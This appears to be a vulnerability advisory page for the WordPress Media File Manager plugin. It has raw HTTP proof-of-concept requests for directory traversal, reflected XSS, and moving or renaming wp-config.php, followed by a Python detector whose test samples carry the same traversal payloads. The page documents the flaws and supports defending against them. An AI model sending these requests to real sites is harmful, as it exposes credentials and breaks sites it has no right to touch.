Media File Manager <= 1.4.2 Authenticated Multiple Vulnerabilities including directory traversal, reflected XSS, file movement, and file renaming
Title | Published | Family |
---|---|---|
WordPress Media File Manager Plugin < 1.4.4 Multiple Vulnerabilities | 6 Mar 2019 00:00 | openvas |
Media File Manager <= 1.4.2 - Authenticated Multiple Vulnerabilities | 5 Nov 2018 00:00 | wpvulndb |
CVE-2018-19042 | 31 Jan 2019 19:00 | cvelist |
CVE-2018-19041 | 31 Jan 2019 19:00 | cvelist |
CVE-2018-19040 | 31 Jan 2019 19:00 | cvelist |
CVE-2018-19043 | 31 Jan 2019 19:00 | cvelist |
Directory traversal | 31 Jan 2019 19:29 | prion |
Design/Logic Flaw | 31 Jan 2019 19:29 | prion |
Directory traversal | 31 Jan 2019 19:29 | prion |
Directory traversal | 31 Jan 2019 19:29 | prion |
Source | Link |
---|---|
packetstormsecurity | www.packetstormsecurity.com/files/150281/ |
vulners | www.vulners.com/exploitdb/EDB-ID:45809 |
Directory Traversal:
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: REDACTED
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 53
Connection: close
Cookie: REDACTED

action=mrelocator_getdir&dir=../../../../../../../etc

Reflected XSS:
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/wordpress/wp-admin/upload.php?page=mrelocator-submenu-handle
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 68
Connection: close
Cookie: REDACTED

action=mrelocator_getdir&dir=[XSS]

Move any file to any dir:
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/wordpress/wp-admin/upload.php?page=mrelocator-submenu-handle
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 75
Connection: close
Cookie: REDACTED

action=mrelocator_move&dir_from=../../&dir_to=../../../&items=wp-config.php

Rename any file:
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/wordpress/wp-admin/upload.php?page=mrelocator-submenu-handle
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 97
Connection: close
Cookie: REDACTED

action=mrelocator_rename&dir=../../&from=wp-config.php&to=wp-config.txt
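
The four requests above share one shape: an `mrelocator_*` action whose path parameters carry `..` segments or markup. The following detection check is an added example, not part of the original advisory or the plugin's code; it assumes form-encoded request bodies are available (for instance from a WAF or proxy audit log), and the names `inspect_body`, `fully_decode` and `SAMPLES` are hypothetical.

```python
from urllib.parse import parse_qs, unquote

# Actions and path-carrying parameters taken from the requests on this page.
ACTIONS = {"mrelocator_getdir", "mrelocator_move", "mrelocator_rename"}
PATH_PARAMS = ("dir", "dir_from", "dir_to", "from", "to", "items")
MARKUP = set("<>\"'")  # characters that should never appear in a directory name


def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding so %252e%252e is seen as '..'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_body(body):
    """Return sorted (param, reason) findings for one form-encoded body."""
    fields = parse_qs(body, keep_blank_values=True)
    if not ACTIONS & set(fields.get("action", [])):
        return []
    findings = set()
    for name in PATH_PARAMS:
        for raw in fields.get(name, []):
            value = fully_decode(raw).replace("\\", "/")
            if ".." in value.split("/"):
                findings.add((name, "traversal"))
            if value.startswith("/") or "\x00" in value:
                findings.add((name, "absolute-or-nul"))
            if MARKUP & set(value):
                findings.add((name, "markup"))
    return sorted(findings)


# Constructed samples: the first two mirror bodies shown above, the rest are made up.
SAMPLES = [
    "action=mrelocator_getdir&dir=../../../../../../../etc",
    "action=mrelocator_rename&dir=../../&from=wp-config.php&to=wp-config.txt",
    "action=mrelocator_getdir&dir=%252e%252e%252f%252e%252e%252f",
    "action=mrelocator_getdir&dir=%3Cb%3E",
    "action=mrelocator_getdir&dir=2018/11/",
    "action=heartbeat&dir=../",
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(inspect_body(body) or "clean", "<-", body)
```
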